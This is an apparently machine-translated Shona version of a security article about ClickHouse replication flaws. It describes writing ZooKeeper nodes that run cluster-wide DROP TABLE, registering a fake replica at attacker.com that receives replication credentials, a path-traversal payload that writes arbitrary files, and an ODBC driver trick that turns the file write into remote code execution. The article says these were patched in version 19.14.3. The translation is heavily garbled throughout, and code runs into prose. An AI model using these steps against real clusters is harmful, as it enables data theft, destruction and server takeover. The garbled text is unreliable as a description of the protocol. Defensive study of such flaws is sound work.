Ichi chinyorwa chichataura nyaya yekusagadzikana kwakanyanya muClickHouse replication protocol, uye icharatidzawo kuti nzvimbo yekurwisa inogona kuwedzerwa sei.
ClickHouse dhatabhesi yekuchengetedza yakakura mavhoriyamu edata, kazhinji uchishandisa anopfuura rimwe replica. Kubatanidza uye kudzokorora muClickHouse kwakavakirwa pamusoro (ZK) uye inoda kodzero dzekunyora.
Iyo yekumisikidza ZK yekumisikidza haidi kuvimbiswa, saka zviuru zveZK maseva anoshandiswa kugadzirisa Kafka, Hadoop, ClickHouse anowanikwa pachena.
Kuti uderedze nzvimbo yako yekurwisa, iwe unofanirwa kugara uchigadzirisa huchokwadi uye mvumo kana uchiisa ZooKeeper
Iko kune zvimwe 0day based Java deerializations, asi fungidzira kuti munhu anorwisa anogona kuverenga nekunyorera kuZooKeeper, inoshandiswa kuClickHouse kudzokorora.
Kana yakagadziridzwa mune cluster modhi, ClickHouse inotsigira yakagoverwa mibvunzo , ichipfuura neZK - kwavari nodes inogadzirwa mupepa /clickhouse/task_queue/ddl.
Semuenzaniso, iwe unogadzira node /clickhouse/task_queue/ddl/query-0001 nezvirimo:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']uye mushure meizvozvo, tafura yekuyedza ichadzimwa pane cluster maseva host1 uye host2. DDL zvakare inotsigira kumhanya CREATE/ALTER/DROP mibvunzo.
Inzwi rinotyisa? Asi munhu anorwisa angawane kupi kero dzeseva?
inoshanda pamwero wematafura ega, kuitira kuti kana tafura yagadzirwa muZK, sevha inotsanangurwa iyo ichava nebasa rekuchinjana metadata nereplicas. Semuenzaniso, paunenge uchiita chikumbiro (ZK inofanira kugadziridzwa, chXX - zita replica, foobar -zita retafura):
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;node dzichagadzirwa mbiru ΠΈ Metadata.
Zvemukati /clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpZvinoita here kubatanidza data kubva muboka iri? Ehe, kana chiteshi chekudzokorora (TCP/9009) pane server chXX-address iyo firewall haizovharwa uye kuvimbiswa kwekudzokorora hakuzogadziriswe. Nzira yekunzvenga sei chokwadi?
Anorwisa anogona kugadzira replica nyowani muZK nekungokopa zvirimo kubva /clickhouse/tables/01-01/foobar/replicas/chXX uye kuchinja zvinoreva host.
Zvemukati /clickhouse/tables/01β01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpIpapo iwe unofanirwa kuudza dzimwe replicas kuti pane nyowani yedata pane server yeanorwisa iyo yavanoda kutora - node inogadzirwa muZK. /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX monotonically kukura counter, iyo inofanirwa kuve yakakura kupfuura yekupedzisira mune yechiitiko log):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2apo source_replica - zita repikicha yeanorwisa yakagadzirwa munhanho yapfuura, block_id - data block identifier, tora - "tora block" command (uye ).
Tevere, replica yega yega inoverenga chiitiko chitsva murogi uye inoenda kune sevha inodzorwa neanorwisa kuti agamuchire block yedata (iyo replication protocol ibhinari, inomhanya pamusoro peHTTP). Server attacker.com achagamuchira zvikumbiro:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXXapo XXX ndiyo data yechokwadi yekudzokorora. Mune zvimwe zviitiko, iyi inogona kunge iri account ine mukana kune dhatabhesi kuburikidza neiyo huru ClickHouse protocol uye HTTP protocol. Sezvawaona, nzvimbo yekurwisa inova yakakura zvakanyanya nekuti ZooKeeper, inoshandiswa kudzokorora, yakasiiwa isina humbowo hwakagadziridzwa.
Ngatitarisei basa rekutora bhuroka yedata kubva kune replica, zvakanyorwa nechivimbo chakazara kuti zvese zvinodzokorora zviri pasi pekutonga kwakakodzera uye pane kuvimbana pakati pavo.
replication processing code
Basa racho rinoverenga runyoro rwemafaira, ipapo mazita avo, saizi, zviri mukati, uye wobva wanyora kune iyo faira system. Izvo zvakakodzera kutsanangura zvakasiyana kuti data inochengetwa sei mufaira system.
Kune akati wandei subdirectories mukati /var/lib/clickhouse (default kuchengetedza dhairekitori kubva kufaira rekugadzirisa):
flags - dhairekitori rekurekodha , inoshandiswa mukugadzirisa mushure mekurasikirwa kwemashoko;
tmp - dhairekitori rekuchengetedza mafaira enguva pfupi;
user_files - mashandiro ane mafaera muzvikumbiro anogumira kune iyi dhairekitori (INTO OUTFILE nevamwe);
Metadata - sql mafaira ane tsananguro yetafura;
preprocessed_configs - yakagadziriswa derivative gadziriso mafaira kubva /etc/clickhouse-server;
dhata - iyo chaiyo dhairekitori ine data pachayo, mune ino dhatabhesi yega yega subdirectory inongogadzirwa pano (semuenzaniso /var/lib/clickhouse/data/default).
Patafura yega yega, subdirectory inogadzirwa mudhairekitori redhatabhesi. Imwe neimwe column ifaira rakasiyana zvichienderana ne . Somuenzaniso kune tafura foobaryakagadzirwa neanorwisa, mafaera anotevera achagadzirwa:
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2Iyo replica inotarisira kugashira mafaera ane mazita akafanana kana ichigadzira bhuroka yedata uye haivatsigire neimwe nzira.
Muverengi anoteerera angangove atonzwa nezve kusachengetedzeka concatenation ye file_name mune basa WriteBufferFromFile. Ehe, izvi zvinobvumira munhu anorwisa kunyora zvisingaite kune chero faira paFS ine kodzero dzemushandisi clickhouse. Kuti uite izvi, mufananidzo unodzorwa neanorwisa unofanirwa kudzorera mhinduro inotevera kuchikumbiro (kupwanya kwemitsara kwawedzerwa kuti kuve nyore kunzwisisa):
x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeperuye mushure mekusangana ../../../../../../../../../tmp/pwned iyo faira ichanyorwa /tmp/pwned nezvirimo hellofromzookeeper.
Pane akati wandei sarudzo dzekushandura faira kunyora kugona kuita kure kure kodhi kuuraya (RCE).
Maduramazwi ekunze muRCE
Mune shanduro dzekare, dhairekitori neClickHouse marongero akachengetwa aine kodzero dzemushandisi clickhouse default. Mafaira ezvigadziriso mafaera eXML anoverengwa sevhisi pakutanga uye obva avhara mukati /var/lib/clickhouse/preprocessed_configs. Kana shanduko dzikaitika, dzinoverengwazve. Kana uchikwanisa kuwana /etc/clickhouse-server anorwisa anogona kugadzira zvake executable type uye wobva waita zvekupokana kodhi. Dzazvino shanduro dzeClickHouse hadzipe kodzero nekusarudzika, asi kana sevha yakagadziridzwa zvishoma nezvishoma, kodzero dzakadaro dzinogona kuramba dziripo. Kana iwe uri kutsigira ClickHouse cluster, tarisa kodzero kune iyo marongero dhairekitori, inofanirwa kunge iri yemushandisi root.
ODBC kusvika kuRCE
Pakuisa pasuru, mushandisi anogadzirwa clickhouse, asi dhairekitori rayo repamba harina kugadzirwa /nonexistent. Nekudaro, kana uchishandisa ekunze maduramazwi, kana zvimwe zvikonzero, vatariri vanogadzira dhairekitori /nonexistent uye ipa mushandisi clickhouse kuwana kunyora kwairi (SSZB! approx. mushanduri).
ClickHouse inotsigira uye inogona kubatana kune mamwe dhatabhesi. MuODBC, unogona kudoma nzira inoenda kuraibhurari yemutyairi wedatabase (.so). Shanduro dzekare dzeClickHouse dzakakubvumidza kuti uite izvi zvakananga mumubati wekukumbira, asi ikozvino cheki chakasimba chetambo yekubatanidza chawedzerwa odbc-bridge, saka hazvichagone kutsanangura nzira yemutyairi kubva pakukumbira. Asi munhu anorwisa anogona here kunyora kudhairekitori repamba achishandisa kusagadzikana kwatsanangurwa pamusoro?
Ngatigadzirei faira ~/.odbc.ini nezvirimo sezvizvi:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.soipapo pakutanga SELECT * FROM odbc('DSN=lalala', 'test', 'test'); raibhurari ichaiswa test.so uye ndakagamuchira RCE (ndatenda kune zano).
Izvi nezvimwe zvinokanganisa zvakagadziriswa muClickHouse vhezheni 19.14.3. Tarisira yako ClickHouse uye ZooKeepers!
Source: www.habr.com